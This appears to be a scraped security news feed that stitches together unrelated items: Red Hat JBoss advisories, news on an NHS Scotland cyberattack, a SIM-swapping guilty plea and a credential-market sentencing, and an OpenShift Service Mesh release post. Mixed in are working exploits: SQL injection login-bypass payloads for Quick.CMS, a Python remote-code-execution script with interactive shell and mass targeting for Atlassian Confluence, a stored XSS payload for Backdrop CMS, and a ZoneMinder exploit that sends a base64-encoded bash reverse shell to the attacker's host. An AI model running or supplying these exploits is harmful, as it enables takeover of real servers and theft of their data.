Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass# Google Dork: N/A# Date: 02-03-2024# Exploit Author: ./H4X.Forensics - Diyar# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/># Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]# Version: 6.7# Tested on: Windows# CVE : N/AHow to exploit :*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php*--> Enter any Email like : root@root.com<mailto:root@root.com>*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Tick the Checkbox*--> Press Login*--> Congratz! *--> SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Payloads Can be use :' or '1'='1' or ''='' or 1]%00' or /* or '' or "a" or '' or 1 or '' or true() or '

Quick.CMS 6.7 SQL Injection

Red Hat Security Advisory 2024-1325-03 - Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling, denial of service, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1325.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 6.0.1 release and security updateAdvisory ID:        RHSA-2024:1325-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1325Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 6.0.1 serves as a replacement for Red Hat JBoss Web Server 6.0.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=6.0https://bugzilla.redhat.com/show_bug.cgi?id=2235370https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1325-03

Red Hat Security Advisory 2024-1324-03 - An update is now available for Red Hat JBoss Web Server 6.0.1 on Red Hat Enterprise Linux versions 8 and 9. Issues addressed include HTTP request smuggling, denial of service, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1324.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 6.0.1 release and security updateAdvisory ID:        RHSA-2024:1324-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1324Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-41080====================================================================Summary: An update is now available for Red Hat JBoss Web Server 6.0.1 on Red Hat Enterprise Linux versions 8 and 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 6.0.1 serves as a replacement for Red Hat JBoss Web Server 6.0.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-41080References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2235370https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1324-03

Atlassian Confluence versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3 suffer from a remote code execution vulnerability.

    # Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability# Date: 25/1/2024# Exploit Author: MaanVader# Vendor Homepage: https://www.atlassian.com/software/confluence# Software Link: https://www.atlassian.com/software/confluence# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3# Tested on: 8.5.3# CVE : CVE-2023-22527import requestsimport argparseimport urllib3from prompt_toolkit import PromptSessionfrom prompt_toolkit.formatted_text import HTMLfrom rich.console import Console# Disable SSL warningsurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Argument parsingparser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")parser.add_argument("-u", "--url", help="Single Confluence Server URL")parser.add_argument("-f", "--file", help="File containing list of IP addresses")parser.add_argument("-c", "--command", help="Command to Execute")parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")args = parser.parse_args()# Rich console for formatted outputconsole = Console()# Function to send payloaddef send_payload(url, command):    headers = {        'Connection': 'close',        'Content-Type': 'application/x-www-form-urlencoded'    }    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'                      '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')    headers['Content-Length'] = str(len(payload))        full_url = f"{url}/template/aui/text-inline.vm"    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)    return response.text.split('<!DOCTYPE html>')[0].strip()# Interactive shell functiondef interactive_shell(url):    session = PromptSession()    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")    while True:        try:            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))            if cmd.lower() in ["exit", "quit"]:                break            response = send_payload(url, cmd)            console.print(response)        except KeyboardInterrupt:            break        except Exception as e:            console.print(f"[bold red]Error: {e}[/bold red]")            break# Process file functiondef process_file(file_path):    with open(file_path, 'r') as file:        for line in file:            ip = line.strip()            url = f"http://{ip}:8090"            console.print(f"Processing {url}")            print(send_payload(url, args.command))# Main execution logicif args.shell and args.url:    interactive_shell(args.url)elif args.url and args.command:    print(send_payload(args.url, args.command))elif args.file and args.command:    process_file(args.file)else:    print("Error: Please provide a valid URL and a command or use the interactive shell option.")

Atlassian Confluence 8.5.3 Remote Code Execution

Backdrop CMS version 1.23.0 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field# Date: 2023-08-21# Exploit Author: Sinem Şahin# Vendor Homepage: https://backdropcms.org/# Version: 1.23.0# Tested on: Windows & XAMPP==> Tutorial <==1- Go to the following url. => http://(HOST)/backdrop/node/add/post2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.3- Press "Save" button.XSS Payload ==> "<script>alert("post_body")</script>

Backdrop CMS 1.23.0 Cross Site Scripting

ZoneMinder Snapshots versions prior to 1.37.33 suffer from an unauthenticated remote code execution vulnerability.

    import reimport requestsfrom bs4 import BeautifulSoupimport argparseimport base64# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots# Date: 12 December 2023# Discovered by : @Unblvr1# Exploit Author: Ravindu Wickramasinghe (@rvizx9)# Vendor Homepage: https://zoneminder.com/# Software Link: https://github.com/ZoneMinder/zoneminder# Version: prior to 1.36.33 and 1.37.33# Tested on: Arch Linux, Kali Linux# CVE : CVE-2023-26035# Github Link : https://github.com/rvizx/CVE-2023-26035class ZoneMinderExploit:    def __init__(self, target_uri):        self.target_uri = target_uri        self.csrf_magic = None    def fetch_csrf_token(self):        print("[>] fetching csrt token")        response = requests.get(self.target_uri)        self.csrf_magic = self.get_csrf_magic(response)        if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):            print(f"[>] recieved the token: {self.csrf_magic}")            return True        print("[!] unable to fetch or parse token.")        return False    def get_csrf_magic(self, response):        return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)    def execute_command(self, cmd):        print("[>] sending payload..")        data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}        response = requests.post(f"{self.target_uri}/index.php", data=data)        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")    def exploit(self, payload):        if self.fetch_csrf_token():            print(f"[>] executing...")            self.execute_command(payload)if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')    parser.add_argument('-p', '--port', required=True, help='port')    args = parser.parse_args()    # generating the payload    ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"      ps2 = base64.b64encode(ps1.encode()).decode()    payload = f"echo {ps2} | base64 -d | /bin/bash"    ZoneMinderExploit(args.target_url).exploit(payload)

ZoneMinder Snapshots Remote Code Execution

By Waqas
Another day, another healthcare-related cyber attack putting already vulnerable individuals at risk.
This is a post from HackRead.com Read the original post: NHS Dumfries and Galloway Faces Cyberattack, Patient Data at Risk

NHS Dumfries and Galloway suffered a cyberattack, potentially compromising patient data. The health board is working with authorities. Learn more about the attack, its potential impact, and how to stay vigilant.

NHS Dumfries and Galloway, a health board serving the southwestern region of Scotland, announced on Friday, March 15, 2024, that it has been targeted by a “focused and ongoing cyber attack.”

The nature of the cyber attack remains undisclosed, but the health board has warned that a “significant quantity of data” belonging to patients and staff may have been compromised.

The health board has activated its established protocols in response to the attack and is working closely with partner agencies, including Police Scotland, the National Cyber Security Centre (NCSC), and the Scottish Government. Their primary focus is on containing the attack, investigating the scope of the breach, and mitigating any potential damage.

NHS Dumfries and Galloway has also acknowledged the possibility of service disruptions due to the ongoing incident. While the specific nature of these disruptions is yet to be determined, they could potentially impact patient appointments, access to online services, or internal administrative functions.

The most concerning aspect of the attack is the potential compromise of patient and staff data. The health board has not yet confirmed the exact type of data accessed, but it could potentially include sensitive information such as names, addresses, medical records, and National Insurance numbers.

NHS Dumfries and Galloway is urging both staff and patients to be vigilant for any suspicious activity. This includes emails or phone calls attempting to gain access to personal information or financial details. They advise individuals to never click on links or open attachments from unknown senders and to report any suspicious activity immediately.

For insights into the incident, we reached out to Richard Staynings, Chief Security Strategist for Cylera, a healthcare cybersecurity that secures 25 NHS Trusts in the UK, who warned of potentially devastating and additional cyber attacks including ransomware on the targeted NHS Dumfries and Galloway systems.

“Police Scotland and the NCSA will now be looking for malware or simple droppers that could be used to launch a more lucrative ransomware attack on NHS Dumfries and Galloway.”

Richard emphasised that while the attack is concerning and unfortunate, it may not pose an immediate threat to people’s lives. He further explained that for a cyberattack to directly endanger lives, it would typically need to compromise not only confidentiality (as in the case of potential data exposure) but also system availability or data integrity.

“It’s a cyberattack that’s unlikely to be a direct risk to life unless a systems availability attack or a data integrity attack accompanies this particular attack against confidentiality. Confidentiality, Integrity and Availability (CIA) are the three pillars of the Security Triad, he explained.” “All three are required for security. To date, most hospitals have focussed their limited security budgets on protection of confidentiality at the expense of integrity and availability and this is one reason why so many hospitals have been extorted by cyber criminals through ransomware attacks.”

Nevertheless, the attack on NHS Dumfries and Galloway goes on to show the growing threat of cyberattacks on healthcare institutions. With vast amounts of sensitive patient data stored electronically, healthcare providers are becoming increasingly attractive targets for cybercriminals.

The full impact of the attack on NHS Dumfries and Galloway is still unfolding. The health board has assured the public that they are taking all necessary steps to investigate the incident, secure their systems, and protect patient data. However, it is likely to take some time before the full extent of the damage is known.

In the meantime, patients of NHS Dumfries and Galloway are advised to stay informed by checking the health board’s website for updates. They should also be extra cautious with any unsolicited communication claiming to be from the NHS.

1.  Hackers set up fake NHS website to spread malware
2.  7TB of Healthcare Data Leak Affects 12 Million Patients
3.  Chinese Malware Targets European Healthcare via USB Drives
4.  NHS data breach exposed sensitive health data of 150,000 patients
5.  Apria Healthcare Discloses Major Data Breach Impacting 1.8M Users

NHS Dumfries and Galloway Faces Cyberattack, Patient Data at Risk

A manager at an unnamed telecommunications company has admitted to SIM swapping his customers.

A 42-year-old manager at an unnamed telecommunications company has admitted SIM swapping customers at his store.

SIM swapping, also known as SIM jacking, is the act of illegally taking over a target’s cell phone number and re-routing it to a phone under the attacker’s control.

Once an attacker has successfully hijacked their victim’s mobile number, they can use it to send and receive calls and messages (and the victim can’t). For that reason, SIM swapping can be used to get around two-factor authentication (2FA) codes sent by SMS message. Armed with an email and password—which are easily bought online— and the 2FA code, an attacker could take over the victim’s online accounts.

SIM swapping can be done in a number of ways, but perhaps the most common involves a social engineering attack on the victim’s carrier. However, if you have a telecoms manager on your payroll then there’s no need for social engineering—they can just do the SIM swap for you.

In May 2021, Jonathan Katz, aka “Luna” was employed as a manager at a telecoms store. Using managerial credentials, he swapped the SIM numbers associated with customers’ phone numbers into mobile devices controlled by another individual, enabling this person to control the customers’ phones and access the customers’ electronic accounts – including email, social media, and cryptocurrency accounts.

In exchange, Katz received $1,000 per SIM swap and a percentage of the revenue from the compromised phone number. He was paid in Bitcoin, which was traced back to Katz’s cryptocurrency account.

Katz pleaded guilty before Chief U.S. District Judge Renée Marie Bumb in Camden federal court on March 12, 2024, to a charge of conspiracy to gain unauthorized access to a protected computer.

Katz was charged for SIM swapping five numbers. He’s now facing a statutory maximum of five years in prison and a fine of up to $250,000. Sentencing is scheduled to take place on July 16, 2024.

**What to do if you are a victim of SIM swapping**

In this case, being careful online would not have helped the victims to prevent the SIM swap. However there are some things that are tell-tale signs of a SIM swapping attack and some things you can do to limit the consequential damage.

*   If your mobile number suddenly is inactive or out of range, call your mobile operator immediately.
*   Check your online accounts immediately if you receive a notification about unusual activity. Contact the account provider if you find you no longer have access yourself.
*   If you can, register for email alerts as well as SMS for your banking transactions, so you continue to receive alerts via your email in case your SIM is deactivated.
*   If you fall victim to a SIM hijacking attempt, change the passwords for services like your online banking and email immediately.
*   If you notice irregular transactions, contact your bank to have your account blocked and avoid further fraud.
*   Contact your cellular service provider so they can stop the attacker by cutting off their access to the mobile network.
*   Consider setting up 2FA on dedicated authentication apps (such as Google Authenticator) or hardware, rather than using SMS.

**Check your digital footprint**

If you want to find out how much of your data has been exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Store manager admits SIM swapping his customers 

A 31-year-old Moldovan national has been sentenced to 42 months in prison in the U.S. for operating an illicit marketplace called E-Root Marketplace that offered for sale hundreds of thousands of compromised credentials, the Department of Justice (DoJ) announced.
Sandu Boris Diaconu was charged with conspiracy to commit access device and computer fraud and possession of 15 or more unauthorized

E-Root Marketplace Admin Sentenced to 42 Months for Selling 350K Stolen Credentials

We are pleased to announce the release of Red Hat OpenShift Service Mesh 2.5. OpenShift Service Mesh is based on the Istio and Kiali projects, and is included as part of all subscription levels of Red Hat OpenShift. OpenShift Service Mesh 2.5 updates the underlying version of Istio to 1.18 and Kiali to 1.73.This release includes updates from Istio 1.17 and 1.18 including subsequent patch releases up to Istio 1.18.7. Most notably, this includes support for Certificate Revocation Lists for external traffic, “developer preview” support for dual-stack IPv4/IPv6, and updates to Gateway API. Thi

We are pleased to announce the release of **Red Hat OpenShift Service Mesh 2.5**. OpenShift Service Mesh is based on the Istio and Kiali projects, and is included as part of all subscription levels of Red Hat OpenShift. OpenShift Service Mesh 2.5 updates the underlying version of Istio to 1.18 and Kiali to 1.73.

This release includes updates from Istio 1.17 and 1.18 including subsequent patch releases up to Istio 1.18.7. Most notably, this includes support for Certificate Revocation Lists for external traffic, “developer preview” support for dual-stack IPv4/IPv6, and updates to Gateway API. This release also includes the general availability of the OpenShift Service Mesh Console plugin, which is now installed with the Kiali operator as well as updates to support the next generation of OpenShift Distributed Tracing based on Tempo.

****Service Mesh on Arm is generally available****

This release makes support for OpenShift Service Mesh on OpenShift clusters based on ArmTM architecture generally available. This includes Kiali and distributed tracing with Jaeger. Red Hat OpenShift aims to give our customers the choice to run applications on the most appropriate infrastructure, so we are pleased to extend support for OpenShift Service Mesh to Arm. 

****Certificate revocation lists for external traffic****

OpenShift Service Mesh supports mutual TLS (mTLS) authentication for services communicating outside of the mesh. Depending on the use case, this can be setup by configuring credentials with an Ingress Gateway for services exposed to external traffic, a ServiceEntry for individual services to originate mTLS or an Egress Gateway for a gateway to originate mTLS. This release introduces the ability to revoke credentials using Certificate Revocation Lists (CRLs) for the above use cases and Online Certificate Status Protocol (OCSP) stapling for an Ingress Gateway. See the Ingress Gateway, Egress TLS Origination and Egress Gateway documentation for more details.

****OpenShift Service Mesh Console plugin is generally available****

OpenShift Service Mesh 2.3 introduced the OpenShift Service Mesh Console to bring Kiali’s topology view and other service mesh information into the OpenShift console. This adds a “Service Mesh” menu and introduces metrics and topology information into the workload and service menus. This provides a unified experience for managing services in Red Hat OpenShift with the benefit of information obtained from service mesh. 

OpenShift Service Mesh Console - Graph View

When the OpenShift Service Mesh Console was introduced, it was installed with a separate operator. Now that it is generally available, it has been integrated into the Kiali operator, and can be installed using the OSSMConsole custom resource definition (CRD).

Note that this plugin only supports pulling information from a single Kiali instance at this time. If multiple Kiali instances are present within a cluster (for example, to support multiple service mesh instances), the serviceNamespace configuration value can be used to specify which service mesh the console plugin will use.

****Distributed tracing updates****

The ability to automatically enable mesh-wide distributed tracing is a core feature of OpenShift Service Mesh. Tracing provides the ability to observe requests as they flow through a system of multiple services. This is critical for identifying bottlenecks, understanding system behavior and providing a more consistent experience to application consumers.

To date, tracing has been provided by the Jaeger and Elasticsearch components. While these have been incredibly reliable, we have heard from customers that they desire greater flexibility as well as support for greater scale, performance and more cost-effective solutions.

With this in mind, Red Hat OpenShift distributed tracing 3.0 was recently made generally available. This major update introduces a new architecture and new components for distributed tracing that OpenShift Service Mesh users should plan to migrate to.

****OpenTelemetry and Tempo components****

Two components make up the new distributed tracing architecture:

*   Red Hat build of OpenTelemetry - a vendor-agnostic way of retrieving, processing and exporting telemetry data (not limited to tracing).
*   Red Hat OpenShift distributed tracing platform (Tempo) - a component based on the Grafana Tempo project for ingesting tracing data via common protocols including Jaeger, Zipkin, and OpenTelemetry. For data persistence, Tempo can be configured to use a variety of object storage providers.

****New observability extension providers****

To enable integration with the above components and to provide additional integrations with OpenShift Service Mesh, we have added support for the “zipkin”, “opentelemetry” and “envoyOtelAls” Istio extension providers. These can now be configured using the “meshConfig.extensionProviders” setting in the “ServiceMeshControlPlane” CRD.

****Kiali and Tempo****

Kiali in OpenShift Service Mesh 2.5 includes support for integrating with Tempo by using the Jaeger API. This is configured in Tempo using the “jaegerQuery” setting in the TempoStack CRD and from Kiali using the “in\_cluster\_url” setting in the Kiali CRD. For more details, see the OpenShift Service Mesh 2.5 release notes.

****Elasticsearch and Jaeger deprecation****

With the introduction of the OpenTelemetry and Tempo based distributed tracing architecture, the Jaeger based distributed tracing platform operator and Elasticsearch operator have been deprecated and will be removed in a future release. While they will continue to be supported as part of their release lifecycles and as integrations with OpenShift Service Mesh, they will no longer receive further enhancements.

****Configuring distributed tracing and service mesh****

While by default OpenShift Service Mesh configures distributed tracing through the ServiceMeshControlPlane CRD, for production, we recommend that customers configure tracing using a separate Jaeger custom resource or the new Tempo operator. In addition to providing greater flexibility of configuration, this will better prepare users to migrate to both OpenShift Distributed Tracing 3 and OpenShift Service Mesh 3.

****Where to start with Service Mesh and Tempo?****

See the OpenShift Service Mesh 2.5 release notes and the “Metrics, logs, and tracing” section of the documentation for more information on using Tempo and the OpenTelemetry collector with Service Mesh.  

****Automatic route creation****

As communicated in our previous release, the automatic route creation feature (which uses a component called Istio OpenShift Routing - or IOR) has been deprecated and will be removed from OpenShift Service Mesh 3. Though this is a convenience feature for configuring gateways with service mesh, it has been our experience that explicitly creating and managing OpenShift routes provides a more transparent and robust production configuration - particularly across upgrades.

This release makes this feature disabled by default. This will not impact existing OpenShift Service Mesh users who were using the feature, as it will continue to be enabled post upgrade.

Users are encouraged to disable this feature and to manage OpenShift route resources for their Gateways independent of Service Mesh, as in addition to providing greater flexibility and control, it will simplify the future migration to OpenShift Service Mesh 3. This change is best made in conjunction with moving to gateway injection for managing all Istio gateways with applications rather than the ServiceMeshControlPlane, which manages gateways with the control plane. Gateway injection along with Gateway API will be the recommended ways to create and manage Gateways in OpenShift Service Mesh 3 and beyond.

****Kiali updates****

Kiali in dark mode theme

OpenShift Service Mesh 2.5 brings additional updates with Kiali 1.73, including:

*   Use of Istio’s Discovery Selectors - Kiali will now take into account Istio’s discovery selectors when deciding which namespaces to display for the user. For more information, see Kiali’s namespace management documentation.
*   Dark mode theme - Kiali now supports a dark mode theme similar to OpenShift Console’s dark mode, which also applies to the OpenShift Service Mesh Console plugin.
*   Clusterwide mode - For more efficient caching, the Kiali CRD includes a new setting “deployment.cluster\_wide\_access”, which when set to “true” will give cluster permissions to the Kiali server. When set to false, the operator creates a role for each namespace that is part of the mesh.
*   Kubernetes Gateway API management - Kiali now also includes the ability to manage multiple Gateway API implementations in parallel. This is done through the new “gateway\_api\_classes” in the Kiali custom resource definition (CRD). Users can then select the “Gateway Class” of their choosing when using the Kubernetes Gateway creation wizard.

For a full list of Kiali updates, see the project release notes.

****Gateway API updates****

OpenShift Service Mesh includes technology preview support for Kubernetes Gateway API resources with Istio. This release updates support for Kubernetes Gateway API, adding support for extra v1beta1 resources and updating the Gateway API version to 0.6.2. The release also includes updates to how Gateways (Kubernetes Gateways, not Istio Gateways) are automatically deployed. See more details on these changes here.

With Gateway API achieving general availability upstream and part of Istio 1.20 and beyond, we plan to make this feature generally available in the next minor release of OpenShift Service Mesh.

****IPv4 / IPv6 dual stack is developer preview****

This release introduces IPv4/IPv6 dual stack support as a developer preview feature, meaning that it is ready for development and experimentation. This was introduced as an experimental feature in Istio 1.17, with several updates since then to address bugs and remaining dual-stack gaps. The feature continues to evolve upstream as it progresses toward Alpha and beyond. As with all developer preview features, feedback is welcome so that we can help to incubate this feature toward general availability.  

****Kiali Backstage plugin is developer preview****

A service mesh does not stand on its own, but acts as a key infrastructure layer within a larger platform that will be made up of many different technologies. In addition to all of its security features and integrations, a service mesh is often an integral part of continuous integration/delivery (CI/CD) infrastructure and thus may drive one or more steps in the application delivery process.

The majority of our users are teams responsible for such platforms and processes. Their goals include making development teams happy and productive so that they can best support the business. It is with this group in mind that Red Hat has developed Red Hat Developer Hub, an enterprise grade offering based on the Backstage.io project. The Backstage project, contributed by Spotify, is an open source framework for building developer portals. Red Hat developed Project Janus, a community for building developer portals, built on Backstage.

To assist in building developer platforms with service mesh and Backstage, the team has recently contributed the Kiali plugin for Backstage. You can read more about using Kiali with the Red Hat developer hub in this blog. A demo of the plugin was provided at a Janus community meeting late last year.

****Istio ambient mesh update****

The Istio project introduced Istio ambient mesh as a sidecar-less Istio data plane implementation. While this is still under heavy development in the Istio community, it has the potential to significantly reduce the resource utilization required to operate a service mesh by shrinking the footprint of Istio by removing sidecars.

Though OpenShift Service Mesh 2.5 does not include support for Istio ambient mesh, the Istio community continues to evolve the design and implementation. Recently, the team at Solo.io contributed a notable architecture change regarding how traffic is redirected between workload pods and the ztunnel node proxy component. This enables ambient mesh to be compatible with the majority of Kubernetes Container Network Interface (CNI) plugins, including both OpenShift’s OVN-Kubernetes and SDN network plugins.

This change along with other Red Hat contributions has enabled our team to successfully validate Istio ambient mesh on OpenShift, confirming that initial support for Istio ambient mesh is planned for a future release of OpenShift Service Mesh. We have also contributed a new “openshift-ambient” profile, which will make testing ambient mesh on OpenShift easier beginning with Istio 1.22. In parallel, the Kiali team continues to add features in support of ambient mesh. Stay tuned for more on this topic, as we prepare to offer Istio ambient mesh as a developer preview feature with the Sail Operator and later in OpenShift Service Mesh 3!

****OpenShift Service Mesh 3 update****

In case you missed it, late last year we published a blog post update regarding the “Sail Operator”, which is a developer preview of OpenShift Service Mesh 3. This provides further updates on our progress on the next major release of OpenShift Service Mesh. We continue to develop this operator - including operator support for canary-style control plane upgrades. We will provide further updates in the coming months as we work toward a Technology Preview release of OpenShift Service Mesh 3. Watch the redhat.com blog for further updates.

Learn more about OpenShift Service Mesh

Tag

#auth